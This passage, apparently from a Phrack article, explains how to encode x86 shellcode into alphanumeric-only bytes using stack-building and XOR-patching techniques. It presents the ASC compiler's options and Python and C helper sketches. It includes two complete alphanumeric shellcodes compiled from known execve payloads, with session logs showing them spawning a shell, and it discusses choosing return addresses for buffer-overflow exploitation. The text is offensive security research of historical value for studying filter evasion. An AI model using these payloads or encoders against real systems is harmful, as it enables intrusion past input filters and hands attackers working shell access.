 We use the same mechanism as for CATEGORY_00, except that we don't need
 to INC/DEC the register containing 0xFFFFFFFF.
 
- CATEGORY_ALPHA:
 We simply push the alphanumeric values on the stack, possibly using a
 random alphanumeric byte "??" to fill the doubleword or the word.
 
  1 BYTE:
   push 0x??B1                    ; ??  B1
   inc esp                        ;     B1

  2 BYTES:
   push 0xB2B1                    ; B2  B1

  3 BYTES:
   push 0x??B3B2B1                ; ??  B3  B2  B1
   inc esp                        ;     B3  B2  B1

  4 BYTES:
   push 0xB4B3B2B1                ; B4  B3  B2  B1    

- CATEGORY_XOR:
 We choose random alphanumeric bytes X1,X2,X3,X4 and Y1,Y2,Y3,Y4, so that
 X1 xor Y1 = B1, X2 xor Y2 = B2, X3 xor Y3 = B3 and X4 xor Y4 = B4
 (see alphanumeric_get_complement() in asc.c).

  1 BYTE:
   push 0x??X1                    ; ??  X1
   pop ax                         ;AX now contains 0x??X1.
   xor ax,0x??Y1                  ;AX now contains 0x??B1.
   push ax                        ; ??  B1
   inc esp                        ;     B1
  
  2 BYTES:
   push 0xX2X1                    ; X2  X1
   pop ax                         ;AX now contains 0xX2X1.
   xor ax,0xY2Y1                  ;AX now contains 0xB2B1.
   push ax                        ; B2  B1

  3 BYTES:
   push 0x??X3X2X1                ; ??  X3  X2  X1
   pop eax                        ;EAX now contains 0x??X3X2X1.
   xor eax,0x??Y3Y2Y1             ;EAX now contains 0x??B3B2B1.
   push eax                       ; ??  B3  B2  B1
   inc esp                        ;     B3  B2  B1

  4 BYTES:
   push 0xX4X3X2X1                ; X4  X3  X2  X1
   pop eax                        ;EAX now contains 0xX4X3X2X1.
   xor eax,0xY4Y3Y2Y1             ;EAX now contains 0xB4B3B2B1.
   push eax                       ; B4  B3  B2  B1

- CATEGORY_ALPHA_NOT and CATEGORY_XOR_NOT:
 We simply generate CATEGORY_ALPHA and CATEGORY_XOR bytes (N1,N2,N3,N4) by
 performing a NOT operation on the original value. We must then cancel the
 effect of this operation by performing a NOT operation again, this time
 on the stack (see alphanumeric_stack_generate_not() in asc.c).

  1 BYTE:
   push esp
   pop ecx                        ;ECX now contains ESP.
                                  ; N1
   xor [ecx],<r8>                 ; B1

  2 BYTES:
   push esp
   pop ecx                        ;ECX now contains ESP.
                                  ; N2  N1
   xor [ecx],<r16>                ; B2  B1

  3 BYTES:
   push esp
   pop ecx                        ;ECX now contains ESP.
                                  ;     N3  N2  N1
   dec ecx                        ; ??  N3  N2  N1
   xor [ecx],<r32>                ; ??  B3  B2  B1
   inc ecx                        ;     B3  B2  B1

  4 BYTES:
   push esp
   pop ecx                        ;ECX now contains ESP.
                                  ; N4  N3  N2  N1
   xor [ecx],<r32>                ; B4  B3  B2  B1

By adding each of these small codes, with the appropriate values, to
our alphanumeric shellcode, we generate an alphanumeric shellcode which
will build our non-alphanumeric shellcode on the stack.
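
To give an idea of how the categories fit together, here is a minimal
Python sketch. It is not the asc.c code: category() and push_xor4() are
our own names, the order in which the categories are tried is an
assumption, and the X/Y bytes are picked deterministically instead of
randomly. push_xor4() emits the 4-byte CATEGORY_XOR block, with the
immediates written in memory order (lowest address first).

```python
import string

ALNUM = sorted((string.digits + string.ascii_letters).encode("ascii"))
ALNUM_SET = frozenset(ALNUM)
# Every byte value obtainable as the XOR of two alphanumeric bytes.
XORABLE = frozenset(x ^ y for x in ALNUM for y in ALNUM)

def category(byte: int) -> str:
    """Pick a category for one byte, trying the simplest ones first."""
    inverted = byte ^ 0xFF
    if byte == 0x00:
        return "CATEGORY_00"
    if byte == 0xFF:
        return "CATEGORY_FF"
    if byte in ALNUM_SET:
        return "CATEGORY_ALPHA"
    if byte in XORABLE:
        return "CATEGORY_XOR"
    if inverted in ALNUM_SET:
        return "CATEGORY_ALPHA_NOT"
    if inverted in XORABLE:
        return "CATEGORY_XOR_NOT"
    raise ValueError(f"no category for byte {byte:#04x}")

def push_xor4(block: bytes) -> bytes:
    """4 BYTES case: push X / pop eax / xor eax,Y / push eax."""
    xs, ys = bytearray(), bytearray()
    for b in block:
        # First alphanumeric X whose complement Y = X ^ b is alphanumeric
        # too (raises StopIteration if the byte is not in XORABLE).
        x = next(x for x in ALNUM if (x ^ b) in ALNUM_SET)
        xs.append(x)
        ys.append(x ^ b)
    return b"h" + bytes(xs) + b"X" + b"5" + bytes(ys) + b"P"

if __name__ == "__main__":
    for value in (0x00, 0x41, 0x0B, 0xCD, 0x80, 0xFF):
        print(f"{value:#04x}: {category(value)}")
    print(push_xor4(b"/bin").decode("ascii"))
```

A real generator would also group consecutive bytes of the same category
into blocks of up to 4 bytes, as described above.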


USING "XOR PATCHES":

Another possibility is to take advantage of an interesting addressing
mode, using both ModR/M and SIB bytes in combination with the following
XOR instruction (see alphanumeric_patches_generate_xor() and "-m patches"
option in asc.c):

 xor [<base>+2*<index>+<disp8>],<r8>
 xor [<base>+2*<index>+<disp8>],<r16> 
 xor [<base>+2*<index>+<disp8>],<r32>
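
To see that such instructions can really be alphanumeric, we can encode
them by hand from the ModR/M and SIB tables. The Python sketch below
(xor_patch() is our own helper) builds the opcode, a ModR/M byte with
mod=01 and r/m=100 (SIB follows), a SIB byte with scale=01, and the
<disp8>. It does not check that the result is alphanumeric; that depends
on the registers and displacement chosen.

```python
R8 = ["al", "cl", "dl", "bl", "ah", "ch", "dh", "bh"]
R16 = ["ax", "cx", "dx", "bx", "sp", "bp", "si", "di"]
R32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

def xor_patch(base: str, index: str, disp8: int, reg: str) -> bytes:
    """Encode xor [base+2*index+disp8],reg (index must not be esp)."""
    if reg in R8:
        prefix, opcode, num = b"", 0x30, R8.index(reg)
    elif reg in R16:
        prefix, opcode, num = b"\x66", 0x31, R16.index(reg)   # o16 prefix
    else:
        prefix, opcode, num = b"", 0x31, R32.index(reg)
    modrm = (0b01 << 6) | (num << 3) | 0b100     # mod=01, r/m=SIB
    sib = (0b01 << 6) | (R32.index(index) << 3) | R32.index(base)
    return prefix + bytes([opcode, modrm, sib, disp8])

if __name__ == "__main__":
    print(xor_patch("ebx", "ebp", ord("0"), "al").decode("ascii"))
    print(xor_patch("edi", "ebp", ord("A"), "ecx").decode("ascii"))
    print(xor_patch("ebx", "ebp", ord("0"), "ax").decode("ascii"))
```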

Suppose we have such an architecture for our shellcode:

 [initialization][patcher][               data                ]

We can initialize some values and registers in [initialization], then use
XOR instructions in [patcher] to patch bytes in [data]:
(see alphanumeric_patches_generate() in asc.c)

 [initialization][patcher][original non-alphanumeric shellcode]

To use this technique, we need to know the starting address of our
shellcode. We can store it in a <base> register, like EBX or EDI.
We must then calculate the offset for the first non-alphanumeric byte to
patch, and generate this offset again by using an <index> register and an
alphanumeric <disp8> value:

 [initialization][patcher][original non-alphanumeric shellcode]
  |                        |
<base>         <base>+2*<index>+<disp8>

The main issue here is that our offset is going to depend on the length
of our [initialization] and [patcher]. Besides, this offset is not
necessarily alphanumeric. Therefore, we'll generate this offset in
[initialization], by writing it on the stack with our previous technique.

We'll try to generate the smallest possible [initialization], by
increasing gradually an arbitrary offset, trying to store the code to
calculate it in [initialization], and possibly add some padding bytes
(see alphanumeric_patches_generate_initialization() in asc.c):

 First iteration:
  [######################][patcher][data]
                           |
                         offset                         
  [code to generate this offset] => too big.

 Second iteration:
  [##########################][patcher][data]
                               |
                         --->offset                         
  [  code to generate this offset  ] => too big.

 Nth iteration:
  [#######################################][patcher][data]
                                            |
                         ---------------->offset
  [ code to generate this offset ] => perfect.

 Adding some padding bytes:
  [#######################################][patcher][data]
                                            |
                         ---------------->offset
  [ code to generate this offset ][padding] => to get the exact size.

 And finally the compiled shellcode:
  [ code to generate the offset  ][padding][patcher][data]
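
This search can be sketched in a few lines of Python. Everything here is
hypothetical: generate() stands for whatever routine produces the code
computing a given offset, the offset is simply taken to be the size of
[initialization], and 'A' (INC ECX) is used as padding byte on the
assumption that ECX may be modified freely at that point.

```python
def fit_initialization(generate, padding: bytes = b"A",
                       limit: int = 4096) -> bytes:
    """Smallest [initialization] whose size equals the offset it builds.

    generate(offset) is a caller-supplied routine returning the
    alphanumeric code that computes `offset` at run time.
    """
    for offset in range(limit):
        code = generate(offset)
        if len(code) <= offset:            # it fits: pad to the exact size
            return code + padding * (offset - len(code))
    raise ValueError("no fitting offset below limit")

if __name__ == "__main__":
    # Toy generator: even offsets are cheaper to build than odd ones.
    toy = lambda offset: b"P" * (6 if offset % 2 else 3)
    print(fit_initialization(toy))
```

With the toy generator, the first offset that fits is 4: three bytes of
code plus one padding byte.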

We will also iterate on the <disp8> value, because some values can give us
an offset that is easy to generate.
What will [data] contain at runtime?
We will use exactly the same manipulations as for the "stack technique",
except that here, we can (we MUST !!!) store alphanumeric values directly
in our [data].

Another problem is that we can only use <r8>, <r16> or <r32> registers.
This prevents us from patching 3 bytes with only one XOR instruction
without modifying the previous or next bytes.

Finally, once we have patched some bytes, we must increment our offset to
reach the next bytes that we need to patch. We can simply increment our
<base>, or increment our <disp8> value if <disp8> is still alphanumeric.


To finish this description of the techniques, let's remember again that
we cannot use all registers and addressing modes... We can only use the
ones that are "alphanumeric compatible". For example, in the "XOR
patching technique", we decided to use the following registers:

 <base> = ebx | edi
 <index> = ebp
 XOR register = eax | ecx
 NOT register = dl | dh | edx | esi

Let's note that those registers are randomly allocated, to add some
basic polymorphism abilities (see alphanumeric_get_register() in asc.c).



----| Some architectures and considerations


Now, we will analyze different general architectures and considerations to
generate alphanumeric shellcodes.


For the "XOR patching technique", the only constraint is that we need to
know the address of our shellcode. Usually this is trivial: we used this
address to overwrite a return address. For example, if we overwrote a
return address, we can easily recover it at the beginning of our shellcode
(see alphanumeric_get_address_stack() and "-a stack" option in asc.c):

 dec esp
 dec esp
 dec esp
 dec esp
 pop <r32>
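
The reasoning is that RET has just popped our overwritten return address,
so it still sits in the 4 bytes right below ESP. The Python sketch below
models this on a small byte array (the function name and the sample
address are ours, chosen only for illustration).

```python
def recover_return_address(ret_addr: int) -> int:
    """Emulate 'dec esp' x4 followed by 'pop <r32>' right after a RET."""
    mem = bytearray(16)
    esp = 8
    # The overwritten return address, as it lies on the stack.
    mem[esp:esp + 4] = ret_addr.to_bytes(4, "little")
    esp += 4                       # RET popped it: ESP now points above it
    for _ in range(4):
        esp -= 1                   # dec esp (4 times)
    value = int.from_bytes(mem[esp:esp + 4], "little")   # pop <r32>
    esp += 4
    return value

CODE = b"LLLL" + b"X"              # dec esp x4, then pop eax

if __name__ == "__main__":
    print(hex(recover_return_address(0xBFFFF6C0)), CODE.decode("ascii"))
```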

The address can also be stored in a register (see "-a <r32>" option in
asc.c). In this case, no preliminary manipulation will be necessary.


For the "stack technique", we can have different interesting
architectures, depending on the position of the buffer we try to smash.
Let's analyze some of them briefly.

If our shellcode is on the stack, followed by a sufficient space and by a
return address, this is really perfect. Let's look at what is going to
happen to our stack: 

 .... AA  AA  AA  AA  00  00  00  00  00  00  RR  RR  RR  RR  SS  SS ....
     [EIP]                                                   [ESP]

 .... AA  AA  AA  AA  00  00  00  00  00  00  RR  BB  BB  BB  SS  SS ....
      -->[EIP]                                   [ESP]<---------

Our non-alphanumeric shellcode gets down to meet the end of our compiled
shellcode. Once we have built our entire original shellcode, we can simply
build padding instructions to connect both shellcodes.

 .... AA  AA  AA  AA  PP  PP  PP  PP  PP  PP  RR  BB  BB  BB  SS  SS ....
      ------>[EIP]   [ESP]<-------------------------------------

 .... AA  AA  AA  AA  PP  PP  PP  PP  PP  PP  RR  BB  BB  BB  SS  SS ....
      -------------------------------------->[EIP]

Where: AA represents bytes of our alphanumeric compiled shellcode.
       00 represents non used positions on the stack.
       SS represents bytes already present on the stack.
       RR represents bytes of our return address.
       BB represents bytes of our non-alphanumeric generated shellcode.
       PP represents bytes of simple padding instructions (ex: INC ECX).

To use this method, we must have an original shellcode with a smaller size
compared to the space between the end of our compiled shellcode and the
value of ESP at the beginning of the execution of our shellcode.
We must also be sure that the last manipulations on the stack (to generate
padding instructions) will not overwrite the last instructions of our
compiled shellcode. If we simply generate alphanumeric padding
instructions, it should not cause any problems.
We can also add some padding instructions at the end of our alphanumeric
compiled shellcode, and let them be overwritten by our generated padding
instructions. This approach is interesting for brute forcing
(see "-s null" option in asc.c).
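
The size condition above can be written down as simple arithmetic. The
sketch below is only an illustration under the assumption that the
original shellcode ends exactly at the value ESP had on entry; the function
name and its parameters are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Hypothetical helper for the layout drawn above.
 *   compiled_end : address just after the last AA byte
 *   esp_at_entry : value of ESP when the compiled shellcode starts
 *   original_size: number of BB bytes that will be pushed
 * On success, stores the number of PP bytes needed to connect both
 * shellcodes and returns 1. Returns 0 if the original does not fit.
 */
static int stack_padding(uint32_t compiled_end, uint32_t esp_at_entry,
                         uint32_t original_size, uint32_t *padding)
{
    uint32_t gap;

    assert(padding != NULL);
    if (esp_at_entry < compiled_end) return 0; /* stack is below our code */
    gap = esp_at_entry - compiled_end;         /* free bytes in between   */
    if (original_size > gap) return 0;         /* BB would overwrite AA   */
    *padding = gap - original_size;
    return 1;
}
```

For example, with 60 free bytes between the end of the compiled shellcode
and ESP, a 50 byte original shellcode leaves 10 bytes to fill with padding
instructions, while a 61 byte one does not fit.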

We can also proceed in a slightly different way, if the space between our
compiled shellcode and the original shellcode has an alphanumeric length
(<disp8> alphanumeric). We simply use 2 inverse conditional jumps, like
this:

 [end of our compiled shellcode]
 jo <disp8>+2 -+
               |
 jno <disp8> --+
               |
 ...           |
               |
label: <-------+
 [begin of our original non-alphanumeric shellcode]
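
A small sketch of this jump pair (hypothetical helper, not part of asc.c).
It assumes the usual IA32 rule that a rel8 displacement is counted from the
end of the jump instruction itself, so the first jump also has to skip the
two bytes of the second one, and both displacement bytes must be
alphanumeric.

```c
#include <assert.h>
#include <stddef.h>

static int is_alnum_byte(unsigned char c)
{
    return (c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') ||
           (c >= 'a' && c <= 'z');
}

/*
 * Hypothetical helper: emit "jo ; jno" so that both jumps land
 * `distance` bytes after the end of the pair.
 * Returns 1 on success, 0 if one of the displacements is not
 * alphanumeric.
 */
static int emit_jo_jno(unsigned char out[4], unsigned char distance)
{
    unsigned char first;

    assert(out != NULL);
    if (!is_alnum_byte(distance)) return 0;
    first = (unsigned char)(distance + 2); /* also skips the JNO itself */
    if (!is_alnum_byte(first)) return 0;
    out[0] = 0x70;     /* JO rel8  = 'p' */
    out[1] = first;
    out[2] = 0x71;     /* JNO rel8 = 'q' */
    out[3] = distance;
    return 1;
}
```

A distance of 0x41 gives the bytes "pCqA". A distance of '9' is rejected
because 0x39+2 = 0x3B (';') is not alphanumeric.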


We can also combine "stack" and "patches" techniques. We build our
original shellcode on the stack (1), and simply jump to it once built (3).
The problem is that we don't have alphanumeric jump instructions. We'll
generate a JMP ESP simply by using the "patches technique" (2) on one byte
(see "-s jmp" option in asc.c):

                                            +--patch (2)-+
                                            |            |
 [non-alphanumeric building code][JMP ESP patching code][jmp esp]
               |                                               |
 +-------------+---------jump (3)------------------------------+
 |             |
 |           build (1)
 |             |
 +-> [non-alphanumeric code]

We can also replace the JMP ESP by the following sequence, easier to
generate (see "-s ret" option in asc.c):

 push esp
 ret
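
One way to see why this sequence is easier to generate is to count the
bytes that are not alphanumeric, and thus need patching, in each variant.
The helper below is a hypothetical illustration; the opcode bytes are the
standard IA32 encodings (FF E4 for JMP ESP, 54 C3 for PUSH ESP / RET).

```c
#include <assert.h>
#include <stddef.h>

static int is_alnum_byte(unsigned char c)
{
    return (c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') ||
           (c >= 'a' && c <= 'z');
}

/* Count the bytes of a code sequence that would have to be patched. */
static size_t count_non_alnum(const unsigned char *code, size_t len)
{
    size_t i, count = 0;

    assert(code != NULL);
    for (i = 0; i < len; i++)
        if (!is_alnum_byte(code[i])) count++;
    return count;
}

static const unsigned char jmp_esp[]      = { 0xFF, 0xE4 }; /* jmp esp       */
static const unsigned char call_esp[]     = { 0xFF, 0xD4 }; /* call esp      */
static const unsigned char push_esp_ret[] = { 0x54, 0xC3 }; /* push esp; ret */
```

JMP ESP and CALL ESP both contain two bytes to patch, while PUSH ESP is
already alphanumeric ('T') and only the RET has to be patched.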


Finally, we can generate yet another style of shellcode. Suppose we have a
really big non-alphanumeric shellcode. It may then be more interesting to
compress it, and to write a small non-alphanumeric decompression engine
(see "-s call" option in asc.c):

                                            +--patch (2)--+
                                            |             |
 [non-alphanumeric building code][CALL ESP patching code][call esp][data]
               |                                                 |
 +-------------+---------call (3)--------------------------------+
 |             |
 |           build (1)
 |             |
 |   <---------+-------------------------------->
 |
 +-> [pop <r32>][decompression engine][jmp <r32>]
         (4)             (5)              (6)

Once the CALL ESP is executed (3), the address of [data] is pushed on the
stack. The engine only has to pop it in a register (4), can then
decompress the data to build the original shellcode (5), and finally jump
to it (6).

As we can see, the possibilities are really endless!



----| ASC, an Alphanumeric Shellcode Compiler


ASC offers some of the techniques proposed above.
What about the possible options?


COMPILATION OPTIONS:

These options allow us to specify the techniques and architecture the
alphanumeric shellcode will use to build the original shellcode.

-a[ddress] stack|<r32> : specifies the start address of the shellcode
 (useful for the patching technique).
 "stack" means we get the address from the stack.
 <r32> specifies a register containing this starting address.
 
-m[ode] stack|patches : chooses the type of alphanumeric shellcode we
 want to generate.
 "stack" generates our shellcode on the stack.
 "patches" generates our shellcode by XOR patching.
 
-s[tack] call|jmp|null|ret : specifies the method (if "-m stack") to
 return to the original shellcode on the stack.
 "call" uses a CALL ESP instruction.
 "jmp" uses a JMP ESP instruction.
 "null" doesn't return to the code (if the original code is right after
  the alphanumeric shellcode).
 "ret" uses PUSH ESP and RET instructions.


DEBUGGING OPTIONS:

These options permit us to insert some breakpoints (int3), and observe the
execution of our alphanumeric shellcode.

-debug-start : inserts a breakpoint at the start of the compiled
 shellcode.

-debug-build-original : inserts a breakpoint before building the original
 shellcode.
 
-debug-build-jump : inserts a breakpoint before building the jump code
 (if we specified the -s option). Useless if "-s null".

-debug-jump : inserts a breakpoint before running the jump instruction
 (if we specified the -s option). If "-s null", the breakpoint will
 simply be at the end of the alphanumeric shellcode.

-debug-original : inserts a breakpoint at the beginning of the original
 shellcode. This breakpoint will be built at runtime.


INPUT/OUTPUT OPTIONS:

-c[har] <char[] name> : specifies a C variable name where a shellcode is
 stored:
 
 char array[]= "blabla" /* my shellcode */
               "blabla";
 
 If no name is specified and several char[] arrays are present, the first
 one will be used. The parser recognizes C comments and multi-line
 arrays. This option also ensures that the input file is read as a C
 file, and not as a binary file.

-f[ormat] bin|c : specifies the output file format. If C format is chosen,
 ASC writes a tiny code to run the alphanumeric shellcode, by simulating
 a RET address overflow. This code cannot run correctly if "-a <r32>"
 or "-s null" options were used.
 
-o[utput] <output file> : specifies the output filename.


EXAMPLES:

Let's finish with some practical examples, using shellcodes from nice
previous Phrack papers ;)


First, have a look at P49-14 (Aleph One's paper).
The first shellcode he writes (testsc.c) contains 00 bytes (normally not a
problem for ASC). We generate a C file and an alphanumeric shellcode,
using "XOR patches":

 rix@debian:~/phrack$ ./asc -c shellcode -f c -o alpha.c p49-14
 Reading p49-14 ... (61 bytes)
 Shellcode (390 bytes):
 LLLLYhb0pLX5b0pLHSSPPWQPPaPWSUTBRDJfh5tDSRajYX0Dka0TkafhN9fYf1Lkb0TkdjfY0Lkf0Tkgfh6rfYf1Lki0tkkh95h8Y1LkmjpY0Lkq0tkrh2wnuX1Dks0tkwjfX0Dkx0tkx0tkyCjnY0LkzC0TkzCCjtX0DkzC0tkzCj3X0Dkz0TkzC0tkzChjG3IY1LkzCCCC0tkzChpfcMX1DkzCCCC0tkzCh4pCnY1Lkz1TkzCCCCfhJGfXf1Dkzf1tkzCCjHX0DkzCCCCjvY0LkzCCCjdX0DkzC0TkzCjWX0Dkz0TkzCjdX0DkzCjXY0Lkz0tkzMdgvvn9F1r8F55h8pG9wnuvjrNfrVx2LGkG3IDpfcM2KgmnJGgbinYshdvD9d
 Writing alpha.c ...
 Done.
 rix@debian:~/phrack$ gcc -o alpha alpha.c
 rix@debian:~/phrack$ ./alpha
 sh-2.03$ exit
 exit
 rix@debian:~/phrack$

It seems to work perfectly. Let's note the alphanumeric shellcode is also
written to stdout.
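
The bytes "hb0pLX5b0pLH" that follow "LLLLY" in the output above are
standard IA32 opcodes: 'h' is PUSH imm32, 'X' is POP EAX, '5' is XOR
EAX,imm32 and 'H' is DEC EAX. The sketch below (a hypothetical helper
written for this illustration, not part of asc.c) simulates that sequence
and shows that it leaves 0xFFFFFFFF in EAX, whatever alphanumeric dword
was chosen.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Read a little-endian dword, as IA32 does for an imm32 operand. */
static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/*
 * Hypothetical helper: recognize the 12 byte sequence
 *   'h' imm32 ; 'X' ; '5' imm32 ; 'H'
 * (push imm32 / pop eax / xor eax,imm32 / dec eax) and simulate it.
 * Returns 1 and stores the final EAX when the opcodes match, else 0.
 */
static int simulate_eax_init(const unsigned char *code, size_t len,
                             uint32_t *eax)
{
    uint32_t value;

    assert(code != NULL && eax != NULL);
    if (len < 12) return 0;
    if (code[0] != 'h' || code[5] != 'X' ||
        code[6] != '5' || code[11] != 'H') return 0;
    value = le32(code + 1);  /* push imm32 ; pop eax */
    value ^= le32(code + 7); /* xor eax,imm32        */
    value -= 1;              /* dec eax              */
    *eax = value;
    return 1;
}
```

The same check applies to the second example of this section, whose
corresponding bytes are "hqjj9X5qjj9H".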


Now, let's compile Klog's shellcode (P55-08). We choose the "stack
technique", with a JMP ESP to return to our original shellcode. We also
insert some breakpoints:

 rix@debian:~/phrack$ ./asc -m stack -s jmp -debug-build-jump
  -debug-jump -debug-original -c sc_linux -f c -o alpha.c P55-08
 Reading P55-08 ... (50 bytes)
 Shellcode (481 bytes):
 LLLLZhqjj9X5qjj9HPWPPSRPPafhshfhVgfXf5ZHfPDhpbinDfhUFfXf5FifPDSDhHIgGX516poPDTYI11fhs2DTY01fhC6fXf5qvfPDfhgzfXf53EfPDTY01fhO3DfhF9fXf5yFfPDTY01fhT2DTY01fhGofXf5dAfPDTY01fhztDTY09fhqmfXf59ffPDfhPNDfhbrDTY09fhDHfXf5EZfPDfhV4fhxufXf57efPDfhl5DfhOSfXf53AfPDfhV4fhFafXf5GzfPDfhxGDTY01fh4IfXf5TFfPDfh7VDfhhvDTY01fh22fXf5m5fPDfh3VDfhWvDTY09fhKzfXf5vWfPDTY01fhe3Dfh8qfXf5fzfPfhRvDTY09fhXXfXf5HFfPDfh0rDTY01fhk5fXf5OkfPfhwPfXf57DfPDTY09fhz3DTY09SQSUSFVDNfhiADTY09WRa0tkbfhUCfXf1Dkcf1tkc3UX
 Writing alpha.c ...
 Done.
 
 rix@debian:~/phrack$ gcc -o alpha alpha.c 
 rix@debian:~/phrack$ gdb alpha
 GNU gdb 19990928
 Copyright 1998 Free Software Foundation, Inc.
 GDB is free software, covered by the GNU General Public License, and you are
 welcome to change it and/or distribute copies of it under certain conditions.
 Type "show copying" to see the conditions.
 There is absolutely no warranty for GDB.  Type "show warranty" for details.
 This GDB was configured as "i686-pc-linux-gnu"...
 (no debugging symbols found)... 
 (gdb) run
 Starting program: /home/rix/phrack/alpha
 (no debugging symbols found)...(no debugging symbols found)...
 Program received signal SIGTRAP, Trace/breakpoint trap.
 0xbffffb1d in ?? ()                          ;-debug-build-jump 
 (gdb) x/22i 0xbffffb1d
 0xbffffb1d:     push   %ebx
 0xbffffb1e:     push   %ecx
 0xbffffb1f:     push   %ebx                  ;EDX will contain 0xFFFFFFFF
 0xbffffb20:     push   %ebp
 0xbffffb21:     push   %ebx
 0xbffffb22:     inc    %esi                  ;ESI contains 0xFFFFFFFF.
 0xbffffb23:     push   %esi                  ;ESI contains 0.
 0xbffffb24:     inc    %esp                  ;00 00 00 on the stack.
 0xbffffb25:     dec    %esi                  ;restores ESI.
 0xbffffb26:     pushw  $0x4169               ;push an alphanumeric word.
 0xbffffb2a:     inc    %esp                  ;an alphanumeric byte on the
                                              ; stack.
 0xbffffb2b:     push   %esp
 0xbffffb2c:     pop    %ecx                  ;ECX contains ESP (the
                                              ; address of the byte).
 0xbffffb2d:     xor    %bh,(%ecx)            ;NOT on this byte (EBP will
                                              ; contain the dword offset).
 0xbffffb2f:     push   %edi                  ;ESI will contain 0xFFFFFFFF
 0xbffffb30:     push   %edx
 0xbffffb31:     popa
 0xbffffb32:     xor    %dh,0x62(%ebx,%ebp,2) ;NOT on the first byte to
                                              ; patch (our 0xCC, int3).
                                              ; Let's note the use of
                                              ; alphanumeric <disp8>, the
                                              ; use of EBX (address of our
                                              ; shellcode) and the use of
                                              ; EBP (the previously stored
                                              ; offset).
 0xbffffb36:     pushw  $0x4355
 0xbffffb3a:     pop    %ax                   ;AX contains 0x4355.
 0xbffffb3c:     xor    %ax,0x63(%ebx,%ebp,2) ;XOR the next 2 bytes
                                              ; (<disp8> is now 0x63).
 0xbffffb41:     xor    %si,0x63(%ebx,%ebp,2) ;NOT these 2 bytes. 
 (gdb) x/3bx 0xbffffb41+5                     ;O16 + XOR + ModR/M +
                                              ; SIB + <disp8> = 5 bytes
 0xbffffb46:     0x33    0x55    0x58         ;The 3 bytes we patched:
                                              ; NOT 0x33 = 0xCC => INT 3
                                              ; NOT (0x55 XOR 0x55) = 0xFF
                                              ; NOT (0x43 XOR 0x58) = 0xE4
                                              ;  => JMP ESP
 (gdb) cont
 Continuing.

 Program received signal SIGTRAP, Trace/breakpoint trap.
 0xbffffb47 in ?? ()                          ;-debug-jump
 (gdb) x/1i 0xbffffb47
 0xbffffb47:     jmp    *%esp                 ;our jump
 (gdb) info reg esp
 esp            0xbffffd41       -1073742527
 (gdb) cont                                   ;Let's run this JMP ESP.
 Continuing.

 Program received signal SIGTRAP, Trace/breakpoint trap.
 0xbffffd42 in ?? ()                          ;(previous ESP)+1
                                              ; (because of our INT3). We
                                              ; are now in our original
                                              ; shellcode.
 (gdb) cont                                   ;Let's run it ;)
 Continuing.
 sh-2.03$ exit                                ;Finally!!!
 exit
 (no debugging symbols found)...(no debugging symbols found)...
 Program exited normally.
 (gdb)
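
The arithmetic annotated in the session above can be replayed in a few
lines of C. This is only a sketch: patch_jump() is a hypothetical name, and
it assumes, as the comments in the trace indicate, that DH and SI contain
0xFF and 0xFFFF at that point.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Replay the three XOR instructions of the trace on the 3 stored bytes.
 *   bytes[0]    : patched by "xor %dh,0x62(...)"  (DH = 0xFF, i.e. NOT)
 *   bytes[1..2] : patched by "xor %ax,0x63(...)" then
 *                 "xor %si,0x63(...)"             (SI = 0xFFFF, i.e. NOT)
 */
static void patch_jump(unsigned char bytes[3], uint16_t ax)
{
    assert(bytes != NULL);
    bytes[0] = (unsigned char)(bytes[0] ^ 0xFF);
    bytes[1] = (unsigned char)(bytes[1] ^ (ax & 0xFF)); /* low byte of AX  */
    bytes[2] = (unsigned char)(bytes[2] ^ (ax >> 8));   /* high byte of AX */
    bytes[1] = (unsigned char)(bytes[1] ^ 0xFF);
    bytes[2] = (unsigned char)(bytes[2] ^ 0xFF);
}
```

Starting from the stored bytes 0x33 0x55 0x58 ("3UX", the end of the
compiled shellcode) and AX=0x4355, the result is 0xCC 0xFF 0xE4, that is
INT 3 followed by JMP ESP.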



----| Conclusion


Writing IA32 alphanumeric shellcodes is, in the end, quite feasible. But
using only alphanumeric addresses is less obvious. In fact, this is the
main problem encountered when we want to use only alphanumeric chars.

In some particular cases, it will however be possible. We'll try to return
to instructions that will themselves return to our shellcode. For example,
on Win32 systems, we can sometimes find interesting instructions at
addresses like 0x0041XXXX (XX are alphanumeric chars). So we can generate
such return addresses.
Partial overwriting of addresses is sometimes also interesting, because we
can take advantage of bytes already present on the stack, and mainly take
advantage of the null byte (that we cannot generate), automatically copied
at the end of the C string.
Note that, sometimes, depending on what we try to exploit, we can use some
other chars, for example '_', '@', '-' or similar common characters. In
such cases, they will obviously be very precious.
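
As an illustration of the address constraint (a sketch only, with a
hypothetical function name), the check below tells whether a 32-bit
address could be written as three alphanumeric bytes followed by the null
byte that terminates the C string. It relies on IA32 being little-endian:
the lowest byte of the address comes first in memory.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

static int is_alnum_byte(unsigned char c)
{
    return (c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') ||
           (c >= 'a' && c <= 'z');
}

/*
 * Hypothetical helper: store the address in memory order in out[0..3]
 * and return 1 when out[0..2] are alphanumeric and out[3] is the null
 * byte that the string terminator can provide.
 */
static int address_as_string(uint32_t addr, unsigned char out[4])
{
    int i;

    assert(out != NULL);
    for (i = 0; i < 4; i++)
        out[i] = (unsigned char)((addr >> (8 * i)) & 0xFF);
    return is_alnum_byte(out[0]) && is_alnum_byte(out[1]) &&
           is_alnum_byte(out[2]) && out[3] == 0;
}
```

An address such as 0x00414243 passes (it is the string "CBA"), while a
typical stack address like 0xbffffb1d does not.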


The "stack technique" seems to need an executable stack... But we can
modify ESP's value at the beginning of our shellcode, and make it point to
our heap, for example. Our original shellcode will then be written to the
heap. However, we need to patch the POP ESP instruction, because it's not
"alphanumeric compliant".


Besides the size (which may lead to some problems), we must also mention
another disadvantage of these techniques: compiled shellcodes are
vulnerable to toupper()/tolower() conversions. Writing an alphanumeric
and toupper()/tolower() resistant shellcode is nearly an impossible task
(remember the first array, with usable instructions).
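
To get a feeling for this weakness, the sketch below (hypothetical helper,
assuming the default "C" locale) counts how many bytes of a compiled
shellcode would be altered by such a conversion. For instance, toupper()
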